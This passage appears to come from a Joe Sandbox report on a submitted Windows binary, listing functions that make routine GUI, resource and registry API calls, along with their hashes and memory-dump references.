API ID: Rect$ClientOffsetScreen$ParentWindow
String ID:
API String ID: 182828750-0
Opcode ID: 5c2a2746acdb61531143b67f5bb878cb0e199b09933d58d68308bcb830f40130
Instruction ID: db807074f18df92656804f2717075c0ac6d6ff17cfd4e0b2cc0f491f901b6d70
Opcode Fuzzy Hash: 5c2a2746acdb61531143b67f5bb878cb0e199b09933d58d68308bcb830f40130
Instruction Fuzzy Hash: 772121B1901209AFDB14DFA5DC89EBFBFB9FF98304B10451AF406E7250DA389944CB61

Function 0055F53F Relevance: 6.1, APIs: 4, Instructions: 66windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09

GetForegroundWindow.USER32 ref: 0055F57C
GetLastActivePopup.USER32(?), ref: 0055F5A0
SendMessageW.USER32(?,0000036D,00000040,00000000), ref: 0055F5B8
SendMessageW.USER32(?,0000036D,00000000,00000000), ref: 0055F5DD

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSendWindow$ActiveException@8ForegroundH_prolog3LastLongPopupThrow
String ID:
API String ID: 2019557511-0
Opcode ID: e8e131230ee9e81b6ec8b6471bf092d7179449ee88bd5c789e2133637a299544
Instruction ID: 4820ca3ab54534f10b57f053521c4b611e4658097cc69a5d920b32aa470b6619
Opcode Fuzzy Hash: e8e131230ee9e81b6ec8b6471bf092d7179449ee88bd5c789e2133637a299544
Instruction Fuzzy Hash: E511C1B2B10241ABDB10AFA69C55F6E3A69EB4870AF00007BBA02D6150FA38DD04C765

Function 004DA4FD Relevance: 6.1, APIs: 4, Instructions: 62windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004DA504

Part of subcall function 004D8E6A: _malloc.LIBCMT ref: 004D8E88

__CxxThrowException@8.LIBCMT ref: 004DA549
FormatMessageW.KERNEL32(00001100,00000000,?,00000800,004DAFE2,00000000,00000000,?,004DAFE2,0062BC4C,00000004,004D8C28,004DAFE2,?,004DAFE2), ref: 004DA573
LocalFree.KERNEL32(004DAFE2,004D8C28,004DAFE2,?,004DAFE2), ref: 004DA5A1

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
String ID:
API String ID: 1776251131-0
Opcode ID: b416bdbfdd1a920a7685aa338598a79f710c77ec37c228997559ccfb53967518
Instruction ID: d0fd1c8880a1ec843140760ba7772a798d99ce93b9432f6365df45fc0e90a648
Opcode Fuzzy Hash: b416bdbfdd1a920a7685aa338598a79f710c77ec37c228997559ccfb53967518
Instruction Fuzzy Hash: E511D071900209FFDB019F64DC15BBE3BB6FF84714F20891AF9258A2A0DB749A118B95

Function 004EF750 Relevance: 6.1, APIs: 4, Instructions: 61windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004EF761
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 004EF7A4
RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 004EF7B0
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 004EF78F

Part of subcall function 0051BCC8: SendMessageW.USER32(?,00000234,00000000,00000000), ref: 0051BD43
Part of subcall function 0051BCC8: SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0051BD6A
Part of subcall function 0051BCC8: SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0051BD87
Part of subcall function 0051BCC8: SendMessageW.USER32(?,00000222,?,00000000), ref: 0051BD9E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: MessageSend$ParentRedrawWindow
String ID:
API String ID: 2139789815-0
Opcode ID: 1cbd641d30e8187d0fbc1ee3582c2cde4bb39150fcd9fa21e890d88841300750
Instruction ID: 7715b137d70c2ebff926a573409d67f43d3cd3b4f92f010ca787f14cbcedd901
Opcode Fuzzy Hash: 1cbd641d30e8187d0fbc1ee3582c2cde4bb39150fcd9fa21e890d88841300750
Instruction Fuzzy Hash: E011E072200288BFEB206F62CCC9E7B7AAAFB84355F10043AF10496250DB799D45DB90

Function 0053F189 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,00000000,00000005), ref: 0053F1B4
LoadResource.KERNEL32(?,00000000), ref: 0053F1BC
LockResource.KERNEL32(00000000), ref: 0053F1CE
FreeResource.KERNEL32(00000000), ref: 0053F21C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: e7c42f0989a7431d9859247346631ef46da0cda733ade0943876c46ffba67c68
Instruction ID: 93685be692cb3f807891aaadf926f838670384af0722f232bfc5b65ed4225d0f
Opcode Fuzzy Hash: e7c42f0989a7431d9859247346631ef46da0cda733ade0943876c46ffba67c68
Instruction Fuzzy Hash: FA118F39940611EBDB209FA5EC48A7BBBB8FF04359F108139F85293650E774ED44E7A0

Function 005155F7 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004ECB9E: GetDlgItem.USER32(?,?), ref: 004ECBAF

GetWindowLongW.USER32(?,000000F0), ref: 00515614
GetWindowTextLengthW.USER32(?), ref: 00515641
GetWindowTextW.USER32(?,00000000,00000100), ref: 00515670
SendMessageW.USER32(?,0000014D,000000FF,?), ref: 00515691

Part of subcall function 004E0D9F: lstrlenW.KERNEL32(?,?,?), ref: 004E0DCB
Part of subcall function 004E0D9F: _memset.LIBCMT ref: 004E0DE9
Part of subcall function 004E0D9F: GetWindowTextW.USER32(00000000,?,00000100), ref: 004E0E03
Part of subcall function 004E0D9F: lstrcmpW.KERNEL32(?,?,?,?), ref: 004E0E15
Part of subcall function 004E0D9F: SetWindowTextW.USER32(00000000,?), ref: 004E0E21

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Text$ItemLengthLongMessageSend_memsetlstrcmplstrlen
String ID:
API String ID: 205973220-0
Opcode ID: 1712046138b1e063fa01b76d4ad14bd7977fd38538b76e09c0a2adff4fb52e20
Instruction ID: 2e43b69d2cbbdfd7f653ba83732c26bf7f8d80c91d4da2bbe0cc2173b49cc6d9
Opcode Fuzzy Hash: 1712046138b1e063fa01b76d4ad14bd7977fd38538b76e09c0a2adff4fb52e20
Instruction Fuzzy Hash: 63117C32100609EBEF01AF64CC05EF97F65FF84360F64461AF9698A1E0DB35A890EB84

Function 004E4326 Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 004E4363
RegCloseKey.ADVAPI32(00000000), ref: 004E436C
swprintf.LIBCMT ref: 004E4389
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004E439A

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: a1bbd12442c3d078deff7648d443a32a6813970a2e23cb4d56a5aa9b1627b5ff
Instruction ID: 43056a8c96ce38c12fbf2075d281cd35c2e4e95ba5161d27a38e69dc582f2a2c
Opcode Fuzzy Hash: a1bbd12442c3d078deff7648d443a32a6813970a2e23cb4d56a5aa9b1627b5ff
Instruction Fuzzy Hash: A0018E72600209BBDB109F658C4AFBB77ACAB88714F10041ABA01E7180DA78F9059769

Function 0050A321 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0050A344
GetWindowRect.USER32(?,?), ref: 0050A35D
WindowFromPoint.USER32(?,?), ref: 0050A369
PtInRect.USER32(?,?,?), ref: 0050A381

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: RectWindow$CursorFromPoint
String ID:
API String ID: 3445796726-0
Opcode ID: bf52f65e0d9812e3decea95f59925c424b70afff57f1f3d7387e84a0eb960963
Instruction ID: 2d40f61d2519a0671d1db22778a64a1130b41cdde4a87c43af34e8306bb6e4c1
Opcode Fuzzy Hash: bf52f65e0d9812e3decea95f59925c424b70afff57f1f3d7387e84a0eb960963
Instruction Fuzzy Hash: D711F8B1E0020AAFCF11AFA598859BFBBF9FF98304B20486AE505E2150DB759905DB61

Function 0053A41D Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(00000000), ref: 0054CD16

Part of subcall function 0054C83F: GetWindowRect.USER32(?,?), ref: 0054C855
Part of subcall function 0054C83F: GetParent.USER32(?), ref: 0054C897
Part of subcall function 0054C83F: GetParent.USER32(?), ref: 0054C8A7

ScreenToClient.USER32(?,?), ref: 0054CD3E
SetCapture.USER32(?), ref: 0054CD5E
GetWindowRect.USER32(?,?), ref: 0054CD99

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ParentRectWindow$CaptureClientCursorScreen
String ID:
API String ID: 3234571238-0
Opcode ID: 63b2817e95d378a5427e232a4c38da0ef80adcaee0a66c9022febf05edbf1f4b
Instruction ID: 06588784170d8349c4483e8aa381f96cd9c7f2220cf301d34a93c3899d8dada0
Opcode Fuzzy Hash: 63b2817e95d378a5427e232a4c38da0ef80adcaee0a66c9022febf05edbf1f4b
Instruction Fuzzy Hash: 53216A71501748EFCB21DB64C808BEABFF9FF88309F1404ADE48A87251DB76AA44DB50

Function 004DC709 Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,00000000,?), ref: 004DC745

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

GetFocus.USER32 ref: 004DC75B
GetParent.USER32(?), ref: 004DC769
SendMessageW.USER32(?,00000028,00000000,00000000), ref: 004DC77C

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: c5a44b0c8fa120e8fb28c90205884c4f1ca67a43671542f6ef3df9f93fc408de
Instruction ID: 1f0ba182ff7e99e0e37599a3d47d21deee6bf9993ada0c80f0e4a3f03a4f7381
Opcode Fuzzy Hash: c5a44b0c8fa120e8fb28c90205884c4f1ca67a43671542f6ef3df9f93fc408de
Instruction Fuzzy Hash: 87118E71101602AFCB20AF65DCD4D2BBBFAFF94315710862FF14686A60CB39AC45DE98

Function 00517457 Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?), ref: 00517475
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0051748E
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005174C1
DragFinish.SHELL32(?), ref: 005174E9

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: 17b9d545b86c246c6099bb19219828fc0f2a5df4bfde698a09f5f747dd5473f2
Instruction ID: 9d6abf296d22f67a7c69c5fbf92e74316c8145fa83a01a065afadac2bc60d2f5
Opcode Fuzzy Hash: 17b9d545b86c246c6099bb19219828fc0f2a5df4bfde698a09f5f747dd5473f2
Instruction Fuzzy Hash: 4C115171A4021CABCF20EB65DC89FED7BB9FB58315F10059AF119A7191CB749984CF60

Function 0055C43E Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

WindowFromPoint.USER32(?,?), ref: 0055C457
GetParent.USER32(00000000), ref: 0055C465
ScreenToClient.USER32(00000000,?), ref: 0055C486
IsWindowEnabled.USER32(00000000), ref: 0055C49F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$ClientEnabledFromParentPointScreen
String ID:
API String ID: 1871804413-0
Opcode ID: f2bc69e100def2dfde96665af75e3f6b1466bfe9c51a2535d9ffddffc0b3e674
Instruction ID: 29119b185255cc61f99058b5a889bcc4e2f50992a84f554a0848d5c34c53d7e5
Opcode Fuzzy Hash: f2bc69e100def2dfde96665af75e3f6b1466bfe9c51a2535d9ffddffc0b3e674
Instruction Fuzzy Hash: 1401B176600610BF8B129B699C24DBEBE7AEFC5712714401AFD11D3310EB79CD05DB50

Function 004EA569 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 004EA579
GetTopWindow.USER32(00000000), ref: 004EA5B8
GetWindow.USER32(00000000,00000002), ref: 004EA5D6

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: c7807f2065f902d2de1a0eb5371074b8d5eba405b9a8ce6eea2258d5e6ce9417
Instruction ID: 8db05a48a8d6c46d1731901af9dce4b73e4fd2ffce722cc4ac9c9f665d7e07ac
Opcode Fuzzy Hash: c7807f2065f902d2de1a0eb5371074b8d5eba405b9a8ce6eea2258d5e6ce9417
Instruction Fuzzy Hash: 0901D732001699BBCF126F92DC04EAF3A26FF59352F144016FA1451160CB3ADA75EFAA

Function 00508C99 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00508CD4
DestroyWindow.USER32(?), ref: 00508CF0
IsWindow.USER32(?), ref: 00508D0F
DestroyWindow.USER32(?), ref: 00508D1F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Destroy
String ID:
API String ID: 3707531092-0
Opcode ID: 8aff8b2a53dbdabfb6481a964e784dfd9b37ae358c72922a160da3c3910fbf04
Instruction ID: 2afab2804fa54bc6e75f2d32bd97150134cc92f16792c11dc7c16933c7084b5d
Opcode Fuzzy Hash: 8aff8b2a53dbdabfb6481a964e784dfd9b37ae358c72922a160da3c3910fbf04
Instruction Fuzzy Hash: 21018032101604AFEF215B65DC85FBABBB5FF60361F14462AE45887190DF35AC14DA64

Function 0051B1DA Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00000000), ref: 0051B1F7

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: CountItemMenu
String ID:
API String ID: 1409047151-0
Opcode ID: c125cffb3128a9783a933dc8d3c866823d41112362f997250e0ec7c60166797a
Instruction ID: 70967af0fe592f2956034c72ad96c2f5f8affb31a1eb8c7aee4b5a37ec3a5014
Opcode Fuzzy Hash: c125cffb3128a9783a933dc8d3c866823d41112362f997250e0ec7c60166797a
Instruction Fuzzy Hash: 63018179A00209BBFB015B65CC84EFE7EA9FB98794F300529F411E2120DB35DDC9E660

Function 004E965A Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 004E9667
GetTopWindow.USER32(00000000), ref: 004E967A

Part of subcall function 004E965A: GetWindow.USER32(00000000,00000002), ref: 004E96C1

GetTopWindow.USER32(?), ref: 004E96AA

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 7bd85c8fd7b37ee58236fa23a137fd80d7c6391cfe9676376735592d18cefa46
Instruction ID: 8e66af47f084e676cacba86fa72351fadce008bd8cfa3196963c85891c7f6b62
Opcode Fuzzy Hash: 7bd85c8fd7b37ee58236fa23a137fd80d7c6391cfe9676376735592d18cefa46
Instruction Fuzzy Hash: E6014432501695B78F222F738C04EAF3A55AF65396F014117FD04A52A0DF39CD119AAD

Function 0051B846 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 0051B86A
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0051B87F
IsWindow.USER32(?), ref: 0051B88D
SetWindowLongW.USER32(?,000000F0,?), ref: 0051B89D

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
